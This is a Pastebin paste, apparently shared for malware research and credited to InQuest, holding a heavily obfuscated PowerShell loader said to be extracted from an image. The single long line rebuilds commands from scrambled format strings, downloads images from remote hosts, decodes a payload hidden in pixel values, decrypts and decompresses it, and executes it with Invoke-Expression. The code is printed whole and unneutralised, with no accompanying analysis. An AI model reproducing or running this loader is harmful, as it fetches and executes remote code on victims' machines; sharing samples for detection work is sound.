Advertisement
dissectmalware

Mal PowerShell Code extracted from Image

Mar 7th, 2019
750
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # https://twitter.com/InQuest/status/1103587872005898246
  2. # Analysis by InQuest.net
  3. &((GEt-VaRIAbLE '*Mdr*').Name[3,11,2]-JoiN'') ((("{14}{136}{54}{58}{119}{24}{137}{92}{98}{156}{59}{124}{84}{135}{129}{11}{103}{44}{9}{128}{106}{143}{110}{28}{96}{40}{30}{97}{125}{100}{60}{112}{56}{69}{25}{62}{65}{57}{118}{49}{99}{133}{66}{41}{147}{88}{23}{22}{116}{140}{43}{95}{82}{146}{10}{121}{77}{0}{53}{48}{101}{120}{111}{139}{18}{1}{52}{113}{104}{149}{42}{37}{79}{6}{141}{94}{90}{148}{76}{35}{75}{21}{130}{81}{47}{145}{64}{31}{102}{107}{80}{108}{5}{26}{71}{152}{67}{3}{73}{46}{32}{155}{19}{34}{45}{17}{134}{83}{105}{144}{7}{12}{55}{4}{154}{91}{117}{153}{150}{61}{86}{38}{109}{51}{70}{89}{63}{142}{33}{13}{114}{122}{68}{138}{78}{36}{74}{2}{132}{15}{126}{151}{87}{20}{16}{8}{93}{50}{39}{29}{85}{127}{123}{27}{115}{131}{72}" -f'}{2}{1}{10}{5}{9}{7}Ryf-f 1GkC1Gk,1Gkpt1Gk,1Gkr','yqhNgTHRyf - 52','MyqhAtCHRyf((.(Ryf{1','eturn rTl{HQPv+QP','{QPv+QPvuyqQPv+QPvhRL} in rTl','Tl{bcyqhZA} ','1Gkt1Gk,1Gkem1Gk,1Gk.IO.MemoryStream1Gk,1GkSyQPv+QPv1Gk)(rTl{Jy','Gk,1Gkco1GkQPv+QPv,1G','};rTl{uY}=.(1GkVN1Gk)(rTl{JyqhAA});QPv+QPv.(Ryf{0}{1}Ryf-f1GkIE1Gk,1GkX1Gk)(rTl{Uy});brea','+QPvx7D1G','yqhMaC} = .(QPv+QPv1GkDF1G','Gkys1Gk,1Gktem.DrQPv+QPva1Gk,1Gkwing1Gk,1GkS1Gk);rTl{Re','kpng1Gk,1Gkhttps:/1','6)-bor(',' ((QPv[Reflection.Assembly]::RyflOAyqhDWiTyqh','yf;rTl{jy','l{PyqhUi','1Gkgb1Gk,1GkQ_','yy}.RyfLyqhe','Gk,1Gko1G','olss rT','ysQPv+QPv1Gk,1Gkt1Gk,1Gkem.IO.Comp1GQPv+QPvk)QPv+QPv(r','E}.RyQPv+QPvfg','yte1Gk,1Gk981Gk,1Gky1Gk)(rTl{CoyqhLsS},rTl{FyqhW});rTl{DyqhCZ} = rTl{hyqh','1Gkecurity1','vSRyf',' = [System.Convert]::Ryffromy','115+[CHar]104+[CHar]103),[CHar]124) 263&( hgi','Ryf(rT','ar]39-repLacE  QPvyqhQPv,[CHar]96 -repLacE  ([CHar]114+[CHar]84+[CHar]10','QPv3}{0}','Gk) (Ryf{4}{1}{2}{0}{3}Ryf -f1GkamRe1Gk,1Gkstem.IO.1Gk,1GkStre1Gk,1Gkader1Gk','1Gk,1Gk51Gk,1Gkx','yqhorRyf((rTl{p}.RyfBRyf-band15)*1','k,QPv+QPv1GkX31GkQPv+QPv,1Gkh1Gk,','Pv+QPvGkssion1Gk,1Gkam1Gk','6623]);rTl{pyqh','ThRyf - 52);rTl{DyqhAQPv+QPvm} = ','2}Ryf -','EplaCe  ([CHar]49+[CHar]71+[CHar]107),[CH','yqhG} = &(1GkDF1Gk) (RQPv+QPvyf{7}{4}{6}{QPv+','yf{3}{0}{7}{4}{12}{2}{1}{5}{11}{8}{9}{10}{6}Ryf-f1Gktem.1Gk,1GkQPv+','iyqhNALyqhBlyQPv+QPvqhOCkRyf(rTl{NyqhYy}, 52, rTl{NyqhYY}.RyflyqhEyqhNg','Byq',' 1Gk)1Gk,1Gkx7D((.+)QPv','1GkY31Gk,1Gkm1Gk,1Gkimages2.i1Gk,1Gk/39/dMn1GkQPv+QPv,1GQPv+QPvk/2QPv+QPv1Gk,','{12}{4}{3}{11}{2}{10}{5}{7}{13}Ryf-f 1Gkttps:1Gk,1Gk//','SsRyf)}rTl{sTyqhRyqheaMRey','.HM1Gk,1GkogQPv+QPvr1Gk)(,rTl{Hyqhe}.RyfGyqheTbYyqhTeSRQPv+QPvyf(20))','(rTl{nyqhYy',')  -crEplaCe  ([CHar]82+[CHar]121+[CHar]102),[CHar]34-cr','Gknt1Gk)).RyfOpyqheyqhNrEaDRyf(rTl{uyqhRl}));rTl{o}=&(1GkDF1Gk) (Ryf{1',');rTl{fyqhAs}','y1Gk,1Gkecurit1Gk,1Gktem.S1Gk,1QPv+QPvGkap1Gk,1GkSys1Gk,1GkACSHA11Gk,1Gky.QPv+QPv1Gk,1Gkhy','qhAmeRyf((Ryf{1}{2}{0','Gk,1QPv+QPvGkmQPv+QPv/vwN91Gk,1Gki.img1Gk,1Gk.1Gk,1GkO7y.1Gk));foreach(rTl','herMode]::RyfcyqhBCRyfQPv+QPv;rTl{lyqhG}.RyfpyqhAyqhdDiNgRyf = [System.Security.Cryptography.PaddingMQPv+QPvode]:','1Gk)(32);[ArrayQPv+QPv]::','QPv+QPv}Ryf -QPv+QPv','+QPvsa1Gk,1Gkl1Gk) (1GkDF1Gk) (Ryf{2QPv+QPv}{0}{1}R','hG}.RyfmyqhodeRyf = [SysQPv','kem.1Gk,1GkSyst1Gk)((.(1GkDF1Gk) QPv+QPv(R',';rTl{fyqhw','G','1','} = .(1GkDF1Gk) (Ryf{0}{1}Ryf-f1GkBy1Gk,1Gkte[]',');rTl{He} QPv+QPv= .(QPv+QPv1GkDF1Gk) (R','yf(rTl{BcyqhZa});r','l{Eyqhcho1}=[System.Text.Encoding]::RyfuyqhTf8Ryf.RyfGetSQPv+QPvT',':RyfZyqhEROQPv+QP','}{','qhBayqhse64strIngRyf(rTlQPv+QPv{CQPv+QPvyqhQPv+QPvIU','D[1]+hgiSHelLId[13]+QPvXQPv)','vyqhFs}};rTl{TyqhMP}=((Ryf{6}{0}{1}QPv+QPv{9}{8}','Ui} = rTl{rEGyqheX}.Ryf',',1Gkre1Gk,1GkpStre1Gk,1Gk.G1Gk,1GkS','5}{0}{4}{2}Ryf QPv+QPv-QPv+QPvf 1GkZi1Gk,1Q','f{6}{4}{3}{8}{0','yqhINgRyf(rTl{O}[0..21','&(1GkDF1GQPv+QPvk) (Ryf{4}{0}{1}{2}{3}Ryf-f1Gks1Gk,','yqhmyqhReayqhDyqhER}.RyfryqhEAdyqhTOenDRyf()};Function VyqhN',' [IO.Compression.CompressionMode]::RyfDeCyqhoyqhMPre','+QPvesRyf(','Gk),(Ryf{4}{1}{','Pv+QPv1Gk,1GkN1Gk);&(Ryf{0','8),[','yf{1}{0}{','+QPv1Gkice1Gk,1GkN1Gk) -Dayh rTl{Echyqho1} -C','Gkptog1Gk,1GkSys1Gk,1GQPv+QPvkr1Gk,1GkQPv+QPvy.Rfc281GkQPv+QPv,1Gks1Gk,1GkSecurity.C1Gk,1GkDer1Gk,1Gkive1Gk,1GkB','0}Ryf -f 1GkQPv+QPvte[]1Gk,1GkBy1','yqhLse});if (rTl{Jyqhma}[0] -eq 0x1f) {rTl{d',');rTl{RyqhA} = rTl{Ryqhy}.RyfgyqheTRESyqhponSeRyf();rTl{ff}=rTl{rA}.Ryf','0}{2}Ry','k}}QPv','rTl{fA','hyTQPv','l{dAyqhyH});rTl{l','{5}{1}QPv+QPv{2QPv+QPv}Ryf -QPv+QPvf1Gkptography1Gk,1G','f','}, 0, rQPv+QPvTl{Fyqhw},','l{lyq',';r','QPv+QPv,1GkSy1Gk)(rTl{DyqhAm}QPv+QPv, rTl{tryqhUe})','yqhgEX} = [regex](((Ryf{1}{0}Ryf -f','l{lyqhG}.RyfcreAtEDEyqhcRyqhYpTyqhOrRyf(rTl','6}{0}{7}{2}{5}{8}{3}Ryf','hCe QPv+QPv{param ([String]rTl{dyqhAYH}, [',';rTl{STRea','(rTl{CyqhIU}){r','f1GkebClie1Gk,1GkNet.W1Gk,1','nG','dEr} = rTl{HMyqhAC}.RyfCyqhoMPUyqhTeHyqhAsHRyf(rTl{nyqhyY}, 52, rTl{ny','+QPvtem.Security.Cryptography.Cip',' = rT','rTl{P}.RyfgRyf -band QPv+QPv15)','Sh','EyqhTByyqhTESRyf(32);rQPv+QPvTl{dEyqhFs} = rTl{HyqhE}.Ry','cOnyqhTentLeyqhNgtHRyf; if (rTl{QPv+QPvfF} -ge 55555){rTl{g}=.(1GkDF1Gk)','RyfCOyqhPYRyf','f ','Tl{Eeyqh','k) (Ry',')}};rT','r]','yf -f1Gkew-1Gk,1GkObjectQ','kijndae1Gk,1GklManagQPv+QPved1Gk,1Gky.Cry1GkQPv+QPv,1GQPv+QPvkstem.S1Gk,1Gk.R1Gk,1Gkecurit1Gk,1GkSy1Gk);rTQPv+QPv','qhAA} = &(Ryf{1}{0}Ry','CHar]36-crEplaCe ([CHa','k)) -cREPLacE([CHAR]120+[CHAR]55+[CHAR]68),[CHAR]92);function nIyq','yf-f 1GkAdd1Gk,1Gk-Type1Gk) -AssemblyName (Ryf{QPv+QPv3}{0}{1}{2}Ryf-f1','Tl{dyqhAM},','eLLI','}{0}{2}Ryf -f1Gket-Cul1Gk,1GkG1Gk,1Gkture1Gk)).RyfeNyqhGyqhlIsHNameRyf).RyfGrOUyqhpsRyf[1].RyfvyqhAlueRyf+Ryf10R',' 0, 32','o.pQPv+QPvng1','}{1}R','hPayqhRTIaLNy','Gk,1GkSysQPv+QPv1Gk,1Gktem.S1Gk)) shg .(Ryf{1}{','yqhR','qh','fGetyqh','qhmA}, ','k) 217000;(0..433)shg.(1Gk%1Gk){foreach(rTl{X} in(0..499)){rTl{P}=rTl{G}.RyfgEtyqhPIyqhxeLRyf(rTl{X},rTl{_});rTl{O}[rQPv+QPvTl{_}*500+rTl{X}]=([math]::RyfflO','String]rTl{COlyqhsS})rTl{nyqhyy} = [Convert]::RyfFyqhROMBASEyqh64yqhsTri','-f1Gkur1Gk,1GQPv+QPvk/1','qhADeR} = .(1GkDF','16);rTl{H','QPvraph1Gk,1','yqhAM} = .(1GkDF1Gk) (RQPv+QPvyf{6}{7}{8}{3}{1}{','{Dyqhcz},QPv+QPv rTl{dEyqhFS});rTQPv+QPvl{jyqhMA} = rTl{fyqhAS}.RyfTraNyqhsfoRmf','kDrawing.1Gk,1QPv+QPvG','f-fQPv','});rTl{HyqhFs} = [SystemQPv+QPv.Text.Encoding]::RyfUyqhTF8Ryf.RyfgeyqhTyqhStrinGR',' (Ryf{3}{2}{1}{0}Ryf -f1GkBitmap1Gk,1G','{TyqhmP}){rTl{ryqhY} = [System.Net.WQPv+QPvebRequest]::RyfCREAyqhTeRyf(rTl{uyQPv+QPvqhRL});rTl{ryqhy}.RyfmeyqhTHodRyf = (Ryf{1}{0}Ryf -f1GkD1Gk,1GkHEAQPv+QPv1Gk','.com1',' -f 1GkQPv+QPv-Nul1Gk,1GkOut1Gk,1Gkl1Gk);.(Ryf{0}{1}Ryf -f1GkQPv')).rEpLACE('263',[STRiNg][CHAR]124).rEpLACE(([CHAR]81+[CHAR]80+[CHAR]118),[STRiNg][CHAR]39).rEpLACE(([CHAR]104+[CHAR]103+[CHAR]105),[STRiNg][CHAR]36) )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement